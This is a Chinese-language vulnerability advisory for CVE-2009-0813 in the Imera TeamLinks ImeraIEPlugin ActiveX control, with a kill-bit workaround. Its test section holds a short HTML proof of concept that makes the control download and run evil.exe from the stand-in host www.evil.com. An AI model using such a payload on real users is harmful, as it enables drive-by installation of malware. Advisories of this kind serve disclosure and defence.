发布日期：2009-03-04
更新日期：2009-03-05

受影响系统：

Imera ImeraIEPlugin.dll 1.0.2.54

描述：

---

BUGTRAQ  ID: 33993
CVE(CAN) ID: CVE-2009-0813

Imera TeamLinks是桌面客户端软件，允许物理分不断组成员之间进行协作。

TeamLinks客户端的ImeraIEPlugin.dll库所提供的ImeraIEPlugin.Pilot.1 ActiveX控件没有正地的处理DownloadHost属性参数，如果用户受骗访问了恶意站点并向该属性传送了恶意参数的话，就可能导致向用户系统下载并执行任意文件。

<*来源：Elazar Broad （elazarb@earthlink.net）
  
  链接：http://secunia.com/advisories/34103/
        http://milw0rm.com/exploits/8144
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<object classid="clsid:75CC8584-86D4-4A50-B976-AA72618322C6"
id="obj">
    <param name="DownloadProtocol" value="http" />
    <param name="DownloadHost" value="www.evil.com" />
    <param name="DownloadPort" value="80" />
    <param name="DownloadURI" value="evil.exe" />
</object>

建议：

---

临时解决方法：

* 为CLSID 75CC8584-86D4-4A50-B976-AA72618322C6设置kill-bit。

厂商补丁：

Imera
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://teamlinks.imera.com/ImeraIEPlugin.cab

浏览次数：2638
严重程度：0（网友投票）